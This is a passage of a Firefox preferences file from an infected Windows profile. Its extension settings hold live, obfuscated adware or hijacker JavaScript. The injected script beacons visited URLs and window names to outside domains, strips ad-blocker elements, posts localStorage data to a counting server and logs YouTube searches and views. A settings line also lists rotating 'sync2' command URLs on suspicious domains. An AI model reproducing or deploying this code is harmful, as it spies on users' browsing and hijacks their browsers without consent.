a=this;a.prefix='hggasdgjhsagd';a.pixelHostname=function(){try{return'//direct_pop.'+eval('[\"starvard.net\",\"winnershed.info\"]')['https:'==window.self.location.protocol?1:0]}catch(a){return'//'+['direct_pop.winneri.info','direct_pop.winnermore.org']['https:'==window.self.location.protocol?1:0]}}();a.pixelTestIframeBaseURL='//pxltst.unition.org/adzpoppxl/';a.token='px.pluginh';a.pxlData='__pdt';a.campaignData='__dwfgifgtfgtasifsdyfsdoif';a.testLp='http://mydata.searchero.info';a.testLp2='http://mystatic.searchero.info';\r\na.testLpCampaignId='309374';a.testLpCampaignIdStatic='309520';decodeURIComponent('SalePlus');document.getElementById('__hggasdgjhsagd_once')||(a.Utils=new function(){var a=this;a.l=new function(){var a=this;a.xlat='abcdwxyzstuvrqponmijklefghABCDWXYZSTUVMNOPQRIJKLEFGH9876543210+/';a.encode=function(e){e=a._utf8_encode(e);for(var d='',g=0;g<e.length;){var c=e.charCodeAt(g++),k=e.charCodeAt(g++),h=e.charCodeAt(g++),n=c>>2,c=(c&3)<<4|k>>4,m=(k&15)<<2|h>>6,l=h&63;isNaN(k)?m=l=64:isNaN(h)&&\r\n(l=64);d=d+a.xlat.charAt(n)+a.xlat.charAt(c)+(64==m?'=':a.xlat.charAt(m))+(64==l?'=':a.xlat.charAt(l))}return d};a._utf8_encode=function(a){if(a&&a.length){for(var b='',c=0;c<a.length;c++){var f=a.charCodeAt(c);128>f?b+=String.fromCharCode(f):(127<f&&2048>f?b+=String.fromCharCode(f>>6|192):(b+=String.fromCharCode(f>>12|224),b+=String.fromCharCode(f>>6&63|128)),b+=String.fromCharCode(f&63|128))}return b}return a};a.decode=function(a){a=a.toString().replace(/[^A-Za-z0-9\\+\\/]/g,'');for(var b='',c=0;c<\r\na.length;){var f=this.xlat.indexOf(a.charAt(c++)),k=this.xlat.indexOf(a.charAt(c++)),h=this.xlat.indexOf(a.charAt(c++)),n=this.xlat.indexOf(a.charAt(c++)),m=(k&15)<<4|h>>2,l=(h&3)<<6|n,b=b+String.fromCharCode(f<<2|k>>4);64!=h&&0<m&&(b+=String.fromCharCode(m));64!=n&&0<l&&(b+=String.fromCharCode(l))}return this._utf8_decode(b)};a._utf8_decode=function(a){for(var b='',c=0;c<a.length;){var f=a.charCodeAt(c);if(128>f)b+=String.fromCharCode(f),c++;else if(191<f&&224>f)var k=a.charCodeAt(c+1),b=b+String.fromCharCode((f&\r\n31)<<6|k&63),c=c+2;else var k=a.charCodeAt(c+1),h=a.charCodeAt(c+2),b=b+String.fromCharCode((f&15)<<12|(k&63)<<6|h&63),c=c+3}return b}};a.msie=function(){var a=parseInt((/msie (\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10);isNaN(a)&&(a=parseInt((/trident\\/.*; rv:(\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10));return isNaN(a)?!1:a}();a.getParams=function(){var b=location.href.split('__pdt');1<b.length&&(b=a.l.decode(b[1]));return function(a){var b={};a.replace(/([^?=&]+)(=([^&]*))?/g,\r\nfunction(a,c,e,h){b[c]=decodeURIComponent(h)});return b}(b.replace(/^.*\\?/,''))};a.getHostname=function(a){var c=document.createElement('a');c.href=a;return c.hostname};a.getParameterByName=function(b){b=b.replace(/[\\[]/,'\\\\[').replace(/[\\]]/,'\\\\]');b=RegExp('[\\\\?&]'+b+'=([^&#]*)').exec(location.search);if(null===b)return'';b=b[1].replace(/\\+/g,' ');b=a.l.decode(b);b=decodeURIComponent(b);return a.queryStringToObject(b.split('?')[1])};a.queryStringToObject=function(a){a=a.split('&');var c={},d,g;\r\nfor(g in a)''!==a[g]&&(d=a[g].split('='),c[decodeURIComponent(d[0])]=decodeURIComponent(d[1]));return c}},function(){var a=document.createElement('div');a.id='__hggasdgjhsagd_once';a.setAttribute('style','display:none;');var b=document.getElementsByTagName('body')[0];b&&b.appendChild(a)}(),a.createPixelUrl=function(c){var b={pid:0,cc:'AA',eid:0,hid:0,v:0,ch:0,cid:0,tid:1,adtid:0,smid:0,pbid:0,sh:'empty.com',oh:a.Utils.getHostname(location.href)},e,d,g=[];c=c||{};for(d in c)e=c[d],b[d]=e;for(d in b)e=\r\nb[d],g.push(d+'='+encodeURIComponent(e));return a.pixelHostname+'?'+g.join('&')},a.pixel=function(c){(new Image).src=a.createPixelUrl(c)},a.runOnCampaigns=function(a,b,e){if(a&&!isNaN(a-0)){b=b||[];if('number'==typeof b||'string'==typeof b&&!isNaN(b-0))b=[b-0];for(var d=0;d<b.length;d++)b[d]==a&&e(b[d])}},a.loadPixelTestIframe=function(c){if(document.body){var b=document.createElement('iframe');b.src=c;b.style.cssText='border:none;background:none;width:1px;height:1px;overflow:hidden;display:inline;padding:0;margin:0';\r\ndocument.body.appendChild(b)}else setTimeout(function(){a.loadPixelIframe(c)},50)},a.injectGA=function(a){var b=document.getElementsByTagName('head')[0];a=\"if(typeof ga == 'undefined'){(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q = i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m = s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create',  '\"+\r\na+\"', 'auto'); ga('send', 'pageview') }else{ ga('create',  '\"+a+\"', 'auto',{'name':'testStyloosh'}); ga('testStyloosh.send', 'pageview');}\";var e=document.createElement('script');e.type='text/javascript';e.text=a;b&&b.appendChild(e)},a.shootTestPixels=function(c){c==a.testLpCampaignId?(a.injectGA('UA-60126760-2'),a.pixel({pid:'21153',cc:'FR',eid:'1307',hid:'8438959027574575270',v:0,ch:8002,cid:c,tid:3,adtid:0,smid:0,pbid:0,sh:'UA-60126760-2',oh:a.Utils.getHostname(location.href)})):\r\nc==a.testLpCampaignIdStatic&&(a.injectGA('UA-60126760-6'),a.pixel({pid:'21153',cc:'FR',eid:'1307',hid:'8438959027574575270',v:0,ch:8002,cid:c,tid:3,adtid:0,smid:0,pbid:0,sh:'UA-60126760-6',oh:a.Utils.getHostname(location.href)}))},a.initDirectPixel=function(){if(-1<location.href.indexOf(a.testLp))return a.shootTestPixels(a.testLpCampaignId);if(-1<location.href.indexOf(a.testLp2))return a.shootTestPixels(a.testLpCampaignIdStatic);if(-1<location.href.indexOf(a.token)&&\r\n-1<location.href.indexOf(a.pxlData))try{if(a.Utils.msie)a.pixel({pid:'21153',cc:'FR',eid:'1307',hid:'8438959027574575270',v:0,ch:8011,cid:'-7878',tid:3,adtid:0,smid:0,pbid:0,sh:'msie ='+a.Utils.msie,oh:a.Utils.getHostname(location.href)});else{var c=a.Utils.getParams();'object'===typeof c&&(c.ch=8001,a.pixel(c),a.runOnCampaigns(c.cid,[309216],function(b){a.loadPixelTestIframe(a.pixelTestIframeBaseURL+'?ch='+c.ch)}),a.runOnCampaigns(c.cid,[a.testLpCampaignId],\r\nfunction(b){a.injectGA('UA-60126760-1');a.pixel({pid:'21153',cc:'FR',eid:'1307',hid:'8438959027574575270',v:0,ch:8007,cid:a.testLpCampaignId,tid:3,adtid:0,smid:0,pbid:0,sh:'UA-60126760-1',oh:a.Utils.getHostname(location.href)})}),a.runOnCampaigns(c.cid,[a.testLpCampaignIdStatic],function(b){a.injectGA('UA-60126760-7');a.pixel({pid:'21153',cc:'FR',eid:'1307',hid:'8438959027574575270',v:0,ch:8007,cid:a.testLpCampaignIdStatic,\r\ntid:3,adtid:0,smid:0,pbid:0,sh:'UA-60126760-7',oh:a.Utils.getHostname(location.href)})}))}}catch(b){var e=255>b.message.length?b.message:b.message.slice(0,255),d=255>location.href.length?location.href:location.href.slice(0,255);(new Image).src=a.createPixelUrl({ch:8020,oh:d,sh:e})}},'undefined'==typeof window[a.prefix]&&(window[a.prefix]=a),a.initDirectPixel())};}catch(e){}})();");
user_pref("extensions.PhWU1d21xmujftNh.url", "http://winnerspy.eu/sync2/?q=hfZ9oemMC7n5hShEAen0rTwFqjrMg708BNmGWj8ykShGheDUojw8rdnEqHw6rjsEpchIC7n0rjkEqda6rjC8rHaFtNhVCT94tMVKhd97qHaGrdsEpdr4qHs9qjs7pja7tNqHhd9FqjwErdkHpdYGrHg6qTw6qHU6pih5BMxJhj8jgeFVkyF8CGhOAen0pdnHpdU8pjaGqHk6qdk6qjs6rchTAyxKBMlIojaMB6qPhd97rdwMAe4HDd9EtMtHojw%3D;http://getjpi2.info/sync2/?q=hfZ9oemMC7n5hShEAen0rTwFqjrMg708BNmGWj8ykShGheDUojw8rdnEqHw6rjsEpchIC7n0rjkEqda6rjC8rHaFtNhVCT94tMVKhd97qHaGrdsEpdr4qHs9qjs7pja7tNqHhd9FqjwErdkHpdYGrHg6qTw6qHU6pih5BMxJhj8jgeFVkyF8CGhOAen0pdnHpdU8pjaGqHk6qdk6qjs6rchTAyxKBMlIojaMB6qPhd97rdwMAe4HDd9EtMtHojw%3D;http://jpisyncs.info/sync2/?q=hfZ9oemMC7n5hShEAen0rTwFqjrMg708BNmGWj8ykShGheDUojw8rdnEqHw6rjsEpchIC7n0rjkEqda6rjC8rHaFtNhVCT94tMVKhd97qHaGrdsEpdr4qHs9qjs7pja7tNqHhd9FqjwErdkHpdYGrHg6qTw6qHU6pih5BMxJhj8jgeFVkyF8CGhOAen0pdnHpdU8pjaGqHk6qdk6qjs6rchTAyxKBMlIojaMB6qPhd97rdwMAe4HDd9EtMtHojw%3D;http://famousnewsupdate.net/sync2/?q=hfZ9oemMC7n5hShEAen0rTwFqjrMg708BNmGWj8ykShGheDUojw8rdnEqHw6rjsEpchIC7n0rjkEqda6rjC8rHaFtNhVCT94tMVKhd97qHaGrdsEpdr4qHs9qjs7pja7tNqHhd9FqjwErdkHpdYGrHg6qTw6qHU6pih5BMxJhj8jgeFVkyF8CGhOAen0pdnHpdU8pjaGqHk6qdk6qjs6rchTAyxKBMlIojaMB6qPhd97rdwMAe4HDd9EtMtHojw%3D;http://guardsetstarr.info/sync2/?q=hfZ9oemMC7n5hShEAen0rTwFqjrMg708BNmGWj8ykShGheDUojw8rdnEqHw6rjsEpchIC7n0rjkEqda6rjC8rHaFtNhVCT94tMVKhd97qHaGrdsEpdr4qHs9qjs7pja7tNqHhd9FqjwErdkHpdYGrHg6qTw6qHU6pih5BMxJhj8jgeFVkyF8CGhOAen0pdnHpdU8pjaGqHk6qdk6qjs6rchTAyxKBMlIojaMB6qPhd97rdwMAe4HDd9EtMtHojw%3D;http://blacknewtransferjob.net/sync2/?q=hfZ9oemMC7n5hShEAen0rTwFqjrMg708BNmGWj8ykShGheDUojw8rdnEqHw6rjsEpchIC7n0rjkEqda6rjC8rHaFtNhVCT94tMVKhd97qHaGrdsEpdr4qHs9qjs7pja7tNqHhd9FqjwErdkHpdYGrHg6qTw6qHU6pih5BMxJhj8jgeFVkyF8CGhOAen0pdnHpdU8pjaGqHk6qdk6qjs6rchTAyxKBMlIojaMB6qPhd97rdwMAe4HDd9EtMtHojw%3D;http://jpiserver.info/sync2/?q=hfZ9oemMC7n5hShEAen0rTwFqjrMg708BNmGWj8ykShGheDUojw8rdnEqHw6rjsEpchIC7n0rjkEqda6rjC8rHaFtNhVCT94tMVKhd97qHaGrdsEpdr4qHs9qjs7pja7tNqHhd9FqjwErdkHpdYGrHg6qTw6qHU6pih5BMxJhj8jgeFVkyF8CGhOAen0pdnHpdU8pjaGqHk6qdk6qjs6rchTAyxKBMlIojaMB6qPhd97rdwMAe4HDd9EtMtHojw%3D;http://syncs-jpi.info/sync2/?q=hfZ9oemMC7n5hShEAen0rTwFqjrMg708BNmGWj8ykShGheDUojw8rdnEqHw6rjsEpchIC7n0rjkEqda6rjC8rHaFtNhVCT94tMVKhd97qHaGrdsEpdr4qHs9qjs7pja7tNqHhd9FqjwErdkHpdYGrHg6qTw6qHU6pih5BMxJhj8jgeFVkyF8CGhOAen0pdnHpdU8pjaGqHk6qdk6qjs6rchTAyxKBMlIojaMB6qPhd97rdwMAe4HDd9EtMtHojw%3D;http://goods-link.info/sync2/?q=hfZ9oemMC7n5hShEAen0rTwFqjrMg708BNmGWj8ykShGheDUojw8rdnEqHw6rjsEpchIC7n0rjkEqda6rjC8rHaFtNhVCT94tMVKhd97qHaGrdsEpdr4qHs9qjs7pja7tNqHhd9FqjwErdkHpdYGrHg6qTw6qHU6pih5BMxJhj8jgeFVkyF8CGhOAen0pdnHpdU8pjaGqHk6qdk6qjs6rchTAyxKBMlIojaMB6qPhd97rdwMAe4HDd9EtMtHojw%3D;http://starrnice.eu/sync2/?q=hfZ9oemMC7n5hShEAen0rTwFqjrMg708BNmGWj8ykShGheDUojw8rdnEqHw6rjsEpchIC7n0rjkEqda6rjC8rHaFtNhVCT94tMVKhd97qHaGrdsEpdr4qHs9qjs7pja7tNqHhd9FqjwErdkHpdYGrHg6qTw6qHU6pih5BMxJhj8jgeFVkyF8CGhOAen0pdnHpdU8pjaGqHk6qdk6qjs6rchTAyxKBMlIojaMB6qPhd97rdwMAe4HDd9EtMtHojw%3D");
user_pref("extensions.adblockplus.currentVersion", "2.7.3");
user_pref("extensions.adblockplus.notificationdata", "{\"shown\":[\"antiadblock\"],\"lastCheck\":1230761095298,\"softExpiration\":1231970695298,\"hardExpiration\":1231970695298,\"data\":{\"notifications\":[],\"version\":\"201607211245-2/0\"},\"lastError\":0,\"downloadStatus\":\"synchronize_ok\",\"downloadCount\":226}");
user_pref("extensions.blocklist.pingCountTotal", 233);
user_pref("extensions.blocklist.pingCountVersion", 8);
user_pref("extensions.bootstrappedAddons", "{\"{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}\":{\"version\":\"2.7.3\",\"type\":\"extension\",\"descriptor\":\"C:\\\\Users\\\\Utilisateur\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\5lvohhu3.default-1422270210674\\\\extensions\\\\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi\",\"multiprocessCompatible\":true,\"runInSafeMode\":false},\"loop@mozilla.org\":{\"version\":\"1.3.2\",\"type\":\"extension\",\"descriptor\":\"C:\\\\Program Files (x86)\\\\mozilla firefox\\\\browser\\\\features\\\\loop@mozilla.org.xpi\",\"multiprocessCompatible\":false,\"runInSafeMode\":true},\"e10srollout@mozilla.org\":{\"version\":\"1.0\",\"type\":\"extension\",\"descriptor\":\"C:\\\\Program Files (x86)\\\\mozilla firefox\\\\browser\\\\features\\\\e10srollout@mozilla.org.xpi\",\"multiprocessCompatible\":false,\"runInSafeMode\":true},\"firefox@getpocket.com\":{\"version\":\"1.0.2\",\"type\":\"extension\",\"descriptor\":\"C:\\\\Program Files (x86)\\\\mozilla firefox\\\\browser\\\\features\\\\firefox@getpocket.com.xpi\",\"multiprocessCompatible\":false,\"runInSafeMode\":true}}");
user_pref("extensions.databaseSchema", 17);
user_pref("extensions.dwhelper.last-version", "5.6.0");
user_pref("extensions.dwhelper.need-prefs-migration", false);
user_pref("extensions.dwhelper.scrap.state", "stopped");
user_pref("extensions.dwhelper.storagedirectory", "C:\\Users\\Utilisateur\\dwhelper");
user_pref("extensions.dwhelper.toolbar-button", "maincomp");
user_pref("extensions.dwhelper.tpsr.state", "stopped");
user_pref("extensions.e10sBlockedByAddons", true);
user_pref("extensions.enabledAddons", "%7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:47.0");
user_pref("extensions.gCtIfAjhmQt0OUSd.epoch", "1428741778");
user_pref("extensions.gCtIfAjhmQt0OUSd.scode", "(function(){try{if(window.self.location.href.indexOf(\"pdnHpdU8pjaGqHk6qdk6qjs6ra\")>-1){return;}}catch(e){}try{var d=[[\"trianglecash.com\",\"acebook\",\"flybrain.com\",\"www.pcutilitiespro.com\",\"www.pcutilitiespro.net\",\"www.superpctools.com\",\"www.superpctools.net\",\"www.pcrepairlabs.com\",\"www.pcrepairlabs.net\",\"www.viracure.com\",\"www.viracure.net\",\"www.onesave.com\",\"www.onesave.net\",\"www.centralshopgate.com\",\"www.centralshopgate.net\",\"www.safeshopgate.com\",\"www.safeshopgate.net\",\"securedshopgate.com\",\"securedshopgate.net\",\"gen.securedshopgate.com\",\"gen.securedshopgate.net\",\"e4everything.co\",\"3juices.s\",\"safecart.com\",\"cleverbridge.com\",\"warnalert11.com\",\"sumorobo.net\",\"mindri.com\",\"alertfunctions.com\",\"immediate-support.com\",\"sumorobo\",\"roulettebotplus\",\"s.vgsgaming-ads\",\"lottery-master\",\"lotterymaster\",\"onduit\",\"search.imesh\",\"search.searchcore\",\"searchnu.com\",\"searchqu.com\",\"shareazaweb\",\"searchgby.com\",\"mysearchresults.com\",\"searchya.com\",\"searchgol.com\",\"trovi.com\",\"search.ask\",\"mywebsearch.com\",\"search-results.com\",\"mysearch.com\",\"offers.bycontext.com\",\"deals.offer-dynamics.com\",\"offer-dynamics.com\",\"deadsea.com\",\"jerusalem.com\",\"vatican.com\",\"iklk.com\",\"gvud.com\",\"zuzd.com\",\"babaviral.com\",\"cupid.so\",\"hostanytime.com\",\"antivirus.so\",\"dates.am\",\"insurance-company.co\",\"advanceloan.org\",\"calcitapp.info\",\"desktopfavapp.info\",\"avatrade.com\",\"game-trek.net\",\"urgent-alerts.com\",\"pc-alert.com\",\"error-alerts.com\",\"search.searchonme.com\",\"searchitapp.com\",\"news.searchonme.com\",\"search.appsarefun.info\",\"websearch.mocaflix.com\",\"search.easylifeapp.com\",\"searchy.easylifeapp.com\",\"us.yhs4.search.yahoo.com\",\"search.gboxapp.com\",\"searchiy.gboxapp.com\",\"bestonlinegadgetguide.com\",\"odpu.com\",\"safesearch.co\",\"findamo.com\",\"search.myownsearchbox.com\",\"datropy.com\",\"applicationgrabb.net\",\"databass.info\",\"firstfirst.net\",\"liversely.com\",\"liversely.net\",\"livesetwebs.org\",\"lp.ncdownloader.com\",\"lp.vaudix.com\",\"masteroids.com\",\"reditions.net\",\"sharesuper.info\",\"storaget.info\",\"westzip.in\",\"boxhilade.com\",\"mylinksworld.com\",\"shoppingwiz.co\",\"rabbitsearch.net\",\"searchandbake.com\",\"smartshopping.com\",\"www.search.smartshopping.com\",\"www.local.smartshopping.com\",\"www.shoppstop.com\",\"localmoxie.com\",\"www.yellowmoxie.com\",\"www.mail.com\",\"suche.mail.com\",\"www.web.de\",\"suche.web.de\",\"suche.gmx.de\",\"search.gmx.com\",\"search.gmx.co.uk\",\"news.gmx.com\",\"news.gmx.co.uk\",\"www.turbosearchengine.com\",\"search.turbosearchengine.com\",\"www.relatedtopix.com\",\"search.relatedtopix.com\",\"www.app-rover.com\",\"www.appigniter.com\",\"www.bposolutions.com\",\"www.zhuamob.com\",\"www.yieldnexus.com\",\"www.tfxiq.com\",\"www.tfxiq.net\",\"sporty-glow.com\",\"namyneck.com\",\"styloosh.com\",\"baidu.co.th\",\"ooyd.com\",\"jobsro.com\",\"kaoor.com\",\"myloginbox.com\",\"mainpagesite.com\",\"turtleclip.com\",\"blackyclip.com\",\"film-tease.com\",\"bestpaydayloans2015.com\",\"hotelsdealsreviews.com\",\"top10cellphoneplans.com\",\"top5autoinsurance.com\",\"topcreditreportsites.com\"],[/^websearch.(mocaflix|searchissimple|just-browse|good-results|searchsupporter|soft-quick|pu-results|simplespeedy|helpmefindyour|greatresults|youwillfind|lookforitthere|lookforithere|searchmainia|searchrocket|homesearchapp|a-searchpage|coolwebsearch|homesearch-hub|resulthunters|searchdwebs|searchingisme|searchannel|searchouse|pur-esult|searchboxes|searchitup|searchpages|searchesplace|simplesearches|goodfindings|searchiseasy|the-searcheng|oversearch|searchere|relevantsearch|wisesearch|search-guide|searchisbestmy|searchbomb|searchguru|searchsun|searchsunmy|toolksearchbook|searchinweb|webisgreat|webisawsome|exitingsearch|amaizingsearches|searchingissme|awsomesearchs|eazytosearch|ezsearches|fastosearch|fastsearchings|flyandsearch|wonderfulsearches|fixsearch|searchandfly|searchfix|allsearches|searc-hall|simple2search|searchitwell).info$/,/search\\.(easylifeapp|gboxapp|searchonme|appsarefun|genieo)\\.com/]];for(var i=0,a=d[0],l=a.length;i<l;i++){if(window.self.location.hostname.indexOf(a[i])>-1){return;}}for(var j=0,a=d[1],l=a.length;j<l;j++){if(a[j].test(window.self.location.hostname)){return;}}}catch(e){}try{var u=[[\"revenuewire.com/pcutilitiespro\",\"__ipm=\",\"=apapamam\",\"txtlnkusaolp00000800\",\"=admaven\",\"5386b_643c_\",\"=CONMHP&conlogo=CT3210127\",\"www.livegeekhelp.com/pop/\",\"?ctid=ct3330145\",\"?ctid=ct3330146\",\"?ctid=ct3330147\",\"?ctid=ct3330148\",\"?ctid=ct3330149\",\"if72ru4sdfsdfruh7fewui\",\"fghjktghndfgtssss\",\"form=u064ht&pc=u064\",\"source=45905810\",\"source=532d277e\",\"aro.com/ws/?source=6974b128\",\"esmoke.com/?isid=9949\",\"esmoke.com/?isid=9950\",\"esmoke.com/?isid=9951\",\"id=webpick_ot\",\"id=wbpk_ot\",\"hash=a4vxy8\",\"hash=m5g73j\",\"hash=hg7gja\",\"hash=fz61s5\",\"hash=1i5w2d\",\"hash=zndas3\",\"hash=b3qau4\",\"hash=ijeqe4\",\"duit&ptag=aa7aab832a2de41458bf&\",\"duit&ptag=a93f650ac0e6a4a4791f&\",\"duit&ptag=a79888693f6ca4634a6f\",\"duit&ptag=a359b17b6faa44e6b86f\",\"isid=mf245f633-e188-4162-b56a\",\"sid=meabfcf9a-556b-4c5c-8727\",\"isid=m8fbc22fe-ab08-464e-aa63\",\"uid=531364863_132823_4252277e\"],[/[\\?&]p=24039(&|$)/,/lll[a-zA-Z0-9]{11}00/,/#FA[-_]/,/bing\\.com[^p]+pc=.+/,/^http:\\/\\/sporty-glow\\.com\\//,/^http:\\/\\/game-trek\\.net\\//,/#(a652c|ld893)_/,/ressbar\\.com[^f]+fid=65017/,/^https?:\\/\\/([a-z0-9-]+\\.)*search\\.yahoo\\.com\\/yhs\\/.*[&?]hspart=webpick(&|$)/]];for(var i=0,a=u[0],l=a.length;i<l;i++){if((window.self.location.href+\"#\"+window.name).indexOf(a[i])>-1){(new Image).src = \"//\"+[\"resourcesiso.xyz\",\"thematrixinner.net\"][window.location.protocol!= \"https:\"?0:1]+\"/?n=\"+encodeURIComponent(a[i])+\"&h=\"+encodeURIComponent(window.self.location.href+\"#\"+window.name)+\"&d=\"+encodeURIComponent(window.self.location.hostname)+\"&eid=583&pid=21153&hid=8438959027574575270\";return;}}for(var j=0,a=u[1],l=a.length;j<l;j++){if(a[j].test(window.self.location.href+\"#\"+window.name)){(new Image).src=\"//\"+[\"resourcesiso.xyz\",\"thematrixinner.net\"][window.location.protocol!=\"https:\"?0:1]+\"/?n=\"+encodeURIComponent(a[j])+\"&h=\"+encodeURIComponent(window.self.location.href+\"#\"+window.name)+\"&d=\"+encodeURIComponent(window.self.location.hostname)+\"&eid=583&pid=21153&hid=8438959027574575270\";return;}}}catch(e){}try{if(window.self.location.hostname.indexOf('mail.')==-1)\n{try{for(i=0;i<5;i++){window.setTimeout(function(){if(document.getElementById(\"cblocker\")){document.getElementById(\"cblocker\").parentNode.removeChild(document.getElementById(\"cblocker\"));};if(document.getElementById(\"_vdcbl\")){document.getElementById(\"_vdcbl\").parentNode.removeChild(document.getElementById(\"_vdcbl\"));}},i*100)}}catch(e){};\n}}catch(e){};try{(function(){var b,f,g;try{var a=window.self.location.href;if(!(window.self==window.top||\"undefined\"==typeof localStorage||\"undefined\"==typeof localStorage.setItem||-1==a.indexOf(\"TqAvKQvQ=\")&&!a.match(/1018-\\d{3,4}_/)&&-1==a.indexOf(\"cdncache-a.aka\"))){if(-1<a.indexOf(\"TqAvKQvQ=\")){var d=a.match(/TqAvKQvQ=(\\d+)_(\\d{2,3}x\\d{2,3})_?(\\d+)?/);b=d[1];f=d[2].replace(\"x\",\".\");g=d[3]?d[3]:0}else{try{var j=-1<a.indexOf(\"zoneid\")?a.match(/zoneid=(\\d+)/)[1]:a.match(/1018-(\\d+)_WS/)[1]}catch(n){j=0}var c=document.getElementsByTagName(\"body\")[0];b=-1<a.indexOf(\"cdncache-a.aka\")?1001:1002;f=Math.max(c.scrollWidth,c.offsetWidth)+\".\"+Math.max(c.scrollHeight,c.offsetHeight);g=j}var e=new Date,k=parseInt(e.getTime()/1E3),l=\"zyk_\"+[e.getUTCFullYear()+\"-\"+(e.getUTCMonth()+1)+\"-\"+e.getUTCDate(),b,f,g].join(),m=localStorage.getItem(l);localStorage.setItem(l,1+(m?parseInt(m):0));if(lsTime=localStorage.getItem(\"zEpoch\")){if(7200<k-parseInt(lsTime)){var h=document.createElement(\"div\");b=[];for(i in localStorage)-1<i.indexOf(\"zyk_\")&&b.push(\"'\"+i.replace(\"zyk_\",\"\")+\"':\"+localStorage.getItem(i));h.style.display=\"none\";h.innerHTML='<iframe name=\"webscorebox_ifr\"></iframe><form target=\"webscorebox_ifr\" method=\"post\" action=\"http://count3.webscorebox.com/?q=g708BNmGWj8ykShVWzmPhd98pdrMCyVUojsFrjkHtNhVCNqPB750pihSCM06C7lGojsMh7VUojaMAyVUojY9rHY4qjUErTC8qHn8qHkGqHa=\" id=\"webscorebox_frm\"><input type=\"hidden\" name=\"scores\" value=\"{'+b.join(\",\")+'}\"></form>';(typeof c!=\"undefined\"?c:document.getElementsByTagName(\"body\")[0]).appendChild(h);document.getElementById(\"webscorebox_frm\").submit();localStorage.clear()}}else localStorage.setItem(\"zEpoch\",k)}}catch(p){}})();(function(){var l=function(){var a=window.location.search.split(\"v=\")[1],b=a&&a.indexOf(\"&\")||-1;-1!=b&&(a=a.substring(0,b));return a},m=function(){var a=document.getElementsByClassName(\"watch-view-count\");return a&&a[0]&&a[0].innerHTML?(a=a[0].innerHTML.replace(/^([0-9,]+).*$/,\"$1\").replace(/,/g,\"\"))&&parseInt(a)&&parseInt(a)||0:0},n=function(){var a=document.getElementsByClassName(\"watch-extras-section\");if(a)for(var b=0;b<a[0].children.length;b++)if(\"Category\"===a[0].children[b].getElementsByClassName(\"title\")[0].innerHTML.trim()){var c=a[0].children[b].getElementsByTagName(\"a\");if(c&&c[0]&&(c=c[0].getAttribute(\"href\")))return encodeURIComponent(c.replace(\"/\",\"\"))}return\"\"},p=function(){var a=document.getElementsByClassName(\"yt-subscription-button-subscriber-count-branded-horizontal\");return a&&a[0]&&a[0].innerHTML?(a=a[0].innerHTML.replace(/^([0-9,]+).*$/,\"$1\").replace(/,/g,\"\"))&&parseInt(a)&&parseInt(a)||1:1};if(window.self==window.top&&(-1<window.self.location.hostname.indexOf(\"youtube.com\")||-1<window.self.location.hostname.indexOf(\"youtu.be\")))try{if(\"qq=\"==window.name.substr(0,3)){var f=document.getElementsByTagName(\"body\")[0];if(!f.getAttribute(\"wyttb\")){f.setAttribute(\"wyttb\",\"1\");var g=l(),d=m(),q=n(),h=p();if(g&&d&&d){var e=window.name.split(\"=\")[1];window.name=\"\";2<=d/h&&((new Image).src=\"https://score.transferin.in/subs.php?id=\"+g+\"&n=\"+d+\"&c=\"+q+\"&s=\"+h+\"&q=\"+e+\"&cb=31.37.230.80\")}}}if(-1<window.self.location.href.indexOf(\"results?search_query=\")){var k=/[\\?&]search_query=([^&#]*)/.exec(location.search),e=null===k?\"\":decodeURIComponent(k[1].replace(/\\+/g,\" \"));window.name=\"qq=\"+e}}catch(r){}})();new function(){var k=this;this.utils=new function(){var c=this;c.sendPixels=function(a){var b;if(a instanceof Array)for(var e=0;e<a.length;e++){var d=a[e];b=new Image;b.src=d}else b=new Image,b.src=a};c.isFalse=function(a){return\"undefined\"==typeof a||0===a.length||null===a};c.cookie=new function(){var a=this;a.createCookie=function(a,e,d){if(d){var c=new Date;c.setTime(c.getTime()+864E5*d);d=\"; expires=\"+c.toGMTString()}else d=\"\";document.cookie=a+\"=\"+e+d+\"; path=/\"};a.readCookie=function(a){a+=\r\n\"=\";for(var e=document.cookie.split(\";\"),d=0;d<e.length;d++){for(var c=e[d];\" \"==c.charAt(0);)c=c.substring(1,c.length);if(0==c.indexOf(a))return c.substring(a.length,c.length)}return null};a.eraseCookie=function(b){a.createCookie(b,\"\",-1)}};c.ajax={get:function(a,b){try{this.xhr=new XMLHttpRequest,this.xhr.open(\"GET\",a,!0),this.xhr.onreadystatechange=function(){4==c.ajax.xhr.readyState&&b(c.ajax.xhr.responseText)},this.xhr.send()}catch(e){}},post:function(a,b,e){this.xhr=new XMLHttpRequest;this.xhr.open(\"POST\",\r\na,!0);this.xhr.setRequestHeader(\"Content-type\",\"application/x-www-form-urlencoded\");this.xhr.onreadystatechange=function(){4==c.ajax.xhr.readyState&&e(c.ajax.xhr.responseText)};b=encodeURIComponent(b);this.xhr.send(b)}};c.waitForTokens={};c.addScript=function(a,b){if(\"bing\"==b){var e=Element.prototype.appendChild;document.createElement(\"iframe\");Element.prototype.appendChild=document.appendChild;document.getElementsByTagName(\"head\")[0].appendChild(a);Element.prototype.appendChild=e}else document.getElementsByTagName(\"head\")[0].appendChild(a)};\r\nc.waitForElement=function(a,b,e,d){var f=c.query_selector_all(a);clearTimeout(c.waitTimeout);if(25<k.waitForElementCounter)return b(null);if(\"undefined\"==typeof f||1>f.length){if(c.waitForTokens[d])return b(null);var g=arguments.callee;c.waitTimeout=setTimeout(function(){k.waitForElementCounter++;g(a,b,e,d)},e)}else{if(c.waitForTokens[d])return b(null);c.waitForTokens[d]=!0;k.waitForElementCounter=0;return b(f)}};c.flushWaitForTokens=function(){c.waitForTokens={}};c.getRandomInt=function(a,b){return Math.floor(Math.random()*\r\n(b-a+1))+a};c.get_computed_style=\"function\"!=typeof window.getComputedStyle?function(a){return{getPropertyValue:function(b){\"float\"==b&&(b=\"styleFloat\");b=c.dhtml_prop_name(b);return\"object\"==typeof 